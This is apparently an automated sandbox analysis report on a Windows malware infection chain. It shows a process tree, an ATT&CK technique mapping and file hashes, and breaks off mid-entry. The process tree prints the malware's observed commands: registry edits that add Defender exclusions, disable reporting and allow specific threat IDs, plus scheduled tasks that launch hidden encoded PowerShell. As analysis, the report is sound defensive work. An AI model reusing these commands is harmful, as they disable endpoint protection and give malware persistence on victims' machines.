                                                                          "C:\Users\Admin\Pictures\CnR8OFuZb8mpLgFLud2CXQU7.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=60 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240328150836" --session-guid=cff1648f-c08c-451d-9a2a-5e58fa74ce77 --server-tracking-blob=Y2JlNDI2ZjNmMTE4Mjk2MDExZGEwNjdkN2JjZjNhMTJhZWExMjE0NGMyMGMxNGQ2YmEwOWNmOTA0OTJlYzRlYzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N180NTYiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMCIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTE2Mzg1MDcuMDMzMSIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N180NTYiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6IjY0ODI4MTMyLWZhMjQtNGU0NC04OTk2LTM1MGQyZjM4Y2RlYyJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1804000000000000
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Enumerates connected drives
                                                                          PID:5176
                                                                          • C:\Users\Admin\Pictures\CnR8OFuZb8mpLgFLud2CXQU7.exe
                                                                            C:\Users\Admin\Pictures\CnR8OFuZb8mpLgFLud2CXQU7.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.35 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2b0,0x6f7fe1d0,0x6f7fe1dc,0x6f7fe1e8
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            PID:1820
                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281508361\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281508361\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:5504
                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281508361\assistant\assistant_installer.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281508361\assistant\assistant_installer.exe" --version
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          PID:3644
                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281508361\assistant\assistant_installer.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281508361\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x11a0040,0x11a004c,0x11a0058
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            PID:5824
                                                                      • C:\Users\Admin\Pictures\qQ2lkYk59mxkeMSIU0tZ8TCi.exe
                                                                        "C:\Users\Admin\Pictures\qQ2lkYk59mxkeMSIU0tZ8TCi.exe"
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        PID:5228
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS2834.tmp\Install.exe
                                                                          .\Install.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:5360
                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS2C6A.tmp\Install.exe
                                                                            .\Install.exe /pcNNdidfG "385118" /S
                                                                            6⤵
                                                                            • Checks BIOS information in registry
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            • Drops file in System32 directory
                                                                            • Enumerates system info in registry
                                                                            PID:5640
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                              7⤵
                                                                                PID:4712
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                  8⤵
                                                                                    PID:4628
                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                      9⤵
                                                                                        PID:6112
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                        9⤵
                                                                                          PID:4080
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                      7⤵
                                                                                        PID:4864
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                          8⤵
                                                                                            PID:648
                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                              9⤵
                                                                                                PID:720
                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                9⤵
                                                                                                  PID:3636
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /CREATE /TN "gKyHUXSUW" /SC once /ST 11:00:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                              7⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:5464
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /run /I /tn "gKyHUXSUW"
                                                                                              7⤵
                                                                                                PID:5572
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /DELETE /F /TN "gKyHUXSUW"
                                                                                                7⤵
                                                                                                  PID:3640
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 15:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\CJixEvV.exe\" id /vFsite_idXDA 385118 /S" /V1 /F
                                                                                                  7⤵
                                                                                                  • Drops file in Windows directory
                                                                                                  • Creates scheduled task(s)
                                                                                                  PID:3296
                                                                                          • C:\Users\Admin\Pictures\ozpMzEuSdVTAX48SYxJlg6i1.exe
                                                                                            "C:\Users\Admin\Pictures\ozpMzEuSdVTAX48SYxJlg6i1.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:3224
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS2F97.tmp\Install.exe
                                                                                              .\Install.exe
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5956
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS3294.tmp\Install.exe
                                                                                                .\Install.exe /pcNNdidfG "385118" /S
                                                                                                6⤵
                                                                                                • Checks BIOS information in registry
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in System32 directory
                                                                                                • Enumerates system info in registry
                                                                                                PID:5940
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                  7⤵
                                                                                                    PID:836
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                      8⤵
                                                                                                        PID:5428
                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                          9⤵
                                                                                                            PID:5572
                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                            9⤵
                                                                                                              PID:6084
                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                          7⤵
                                                                                                            PID:5136
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                              8⤵
                                                                                                                PID:3896
                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                  9⤵
                                                                                                                    PID:1028
                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                    9⤵
                                                                                                                      PID:996
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /CREATE /TN "gdvxPXgif" /SC once /ST 01:45:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                  7⤵
                                                                                                                  • Creates scheduled task(s)
                                                                                                                  PID:3372
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /run /I /tn "gdvxPXgif"
                                                                                                                  7⤵
                                                                                                                    PID:5792
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /DELETE /F /TN "gdvxPXgif"
                                                                                                                    7⤵
                                                                                                                      PID:2000
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 15:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\qKFHstK.exe\" id /KWsite_idqrI 385118 /S" /V1 /F
                                                                                                                      7⤵
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Creates scheduled task(s)
                                                                                                                      PID:3720
                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                                                                                                            2⤵
                                                                                                            • Blocklisted process makes network request
                                                                                                            • Loads dropped DLL
                                                                                                            PID:2844
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1001052001\Eljlre.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1001052001\Eljlre.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:3760
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5616 -ip 5616
                                                                                                          1⤵
                                                                                                            PID:5988
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5968 -ip 5968
                                                                                                            1⤵
                                                                                                              PID:5556
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 1672 -ip 1672
                                                                                                              1⤵
                                                                                                                PID:3224
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5968 -ip 5968
                                                                                                                1⤵
                                                                                                                  PID:2292
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5124 -ip 5124
                                                                                                                  1⤵
                                                                                                                    PID:5428
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                    1⤵
                                                                                                                      PID:5812
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                      1⤵
                                                                                                                        PID:4980
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                        1⤵
                                                                                                                          PID:3088
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                          1⤵
                                                                                                                            PID:5412
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                                                            1⤵
                                                                                                                              PID:6112
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                              1⤵
                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Identifies Wine through registry keys
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              PID:4004
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1001050001\NewB.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\1001050001\NewB.exe
                                                                                                                              1⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5200
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5140 -ip 5140
                                                                                                                              1⤵
                                                                                                                                PID:3068
                                                                                                                              • C:\Windows\windefender.exe
                                                                                                                                C:\Windows\windefender.exe
                                                                                                                                1⤵
                                                                                                                                  PID:3860
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\qKFHstK.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\qKFHstK.exe id /KWsite_idqrI 385118 /S
                                                                                                                                  1⤵
                                                                                                                                    PID:3356
                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                      2⤵
                                                                                                                                        PID:1568
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:5688
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                              4⤵
                                                                                                                                                PID:4740
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:5460
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1001050001\NewB.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1001050001\NewB.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:5012

                                                                                                                                            Network

                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                            Execution

                                                                                                                                            Scheduled Task/Job

                                                                                                                                            1
                                                                                                                                            T1053

                                                                                                                                            Persistence

                                                                                                                                            Create or Modify System Process

                                                                                                                                            2
                                                                                                                                            T1543

                                                                                                                                            Windows Service

                                                                                                                                            2
                                                                                                                                            T1543.003

                                                                                                                                            Boot or Logon Autostart Execution

                                                                                                                                            1
                                                                                                                                            T1547

                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                            1
                                                                                                                                            T1547.001

                                                                                                                                            Scheduled Task/Job

                                                                                                                                            1
                                                                                                                                            T1053

                                                                                                                                            Privilege Escalation

                                                                                                                                            Create or Modify System Process

                                                                                                                                            2
                                                                                                                                            T1543

                                                                                                                                            Windows Service

                                                                                                                                            2
                                                                                                                                            T1543.003

                                                                                                                                            Boot or Logon Autostart Execution

                                                                                                                                            1
                                                                                                                                            T1547

                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                            1
                                                                                                                                            T1547.001

                                                                                                                                            Scheduled Task/Job

                                                                                                                                            1
                                                                                                                                            T1053

                                                                                                                                            Defense Evasion

                                                                                                                                            Modify Registry

                                                                                                                                            3
                                                                                                                                            T1112

                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                            2
                                                                                                                                            T1497

                                                                                                                                            Impair Defenses

                                                                                                                                            1
                                                                                                                                            T1562

                                                                                                                                            Disable or Modify System Firewall

                                                                                                                                            1
                                                                                                                                            T1562.004

                                                                                                                                            Subvert Trust Controls

                                                                                                                                            1
                                                                                                                                            T1553

                                                                                                                                            Install Root Certificate

                                                                                                                                            1
                                                                                                                                            T1553.004

                                                                                                                                            Credential Access

                                                                                                                                            Unsecured Credentials

                                                                                                                                            6
                                                                                                                                            T1552

                                                                                                                                            Credentials In Files

                                                                                                                                            5
                                                                                                                                            T1552.001

                                                                                                                                            Credentials in Registry

                                                                                                                                            1
                                                                                                                                            T1552.002

                                                                                                                                            Discovery

                                                                                                                                            Query Registry

                                                                                                                                            8
                                                                                                                                            T1012

                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                            2
                                                                                                                                            T1497

                                                                                                                                            System Information Discovery

                                                                                                                                            8
                                                                                                                                            T1082

                                                                                                                                            Peripheral Device Discovery

                                                                                                                                            1
                                                                                                                                            T1120

                                                                                                                                            Remote System Discovery

                                                                                                                                            1
                                                                                                                                            T1018

                                                                                                                                            Collection

                                                                                                                                            Data from Local System

                                                                                                                                            6
                                                                                                                                            T1005

                                                                                                                                            Command and Control

                                                                                                                                            Web Service

                                                                                                                                            1
                                                                                                                                            T1102

                                                                                                                                            Replay Monitor

                                                                                                                                            Loading Replay Monitor...

                                                                                                                                            Downloads

                                                                                                                                            • C:\ProgramData\Are.docx
                                                                                                                                              Filesize

                                                                                                                                              11KB

                                                                                                                                              MD5

                                                                                                                                              a33e5b189842c5867f46566bdbf7a095

                                                                                                                                              SHA1

                                                                                                                                              e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                                                                                              SHA256

                                                                                                                                              5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                                                                                              SHA512

                                                                                                                                              f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                                                                                            • C:\ProgramData\mozglue.dll
                                                                                                                                              Filesize

                                                                                                                                              593KB

                                                                                                                                              MD5

                                                                                                                                              c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                              SHA1

                                                                                                                                              95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                              SHA256

                                                                                                                                              ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                              SHA512

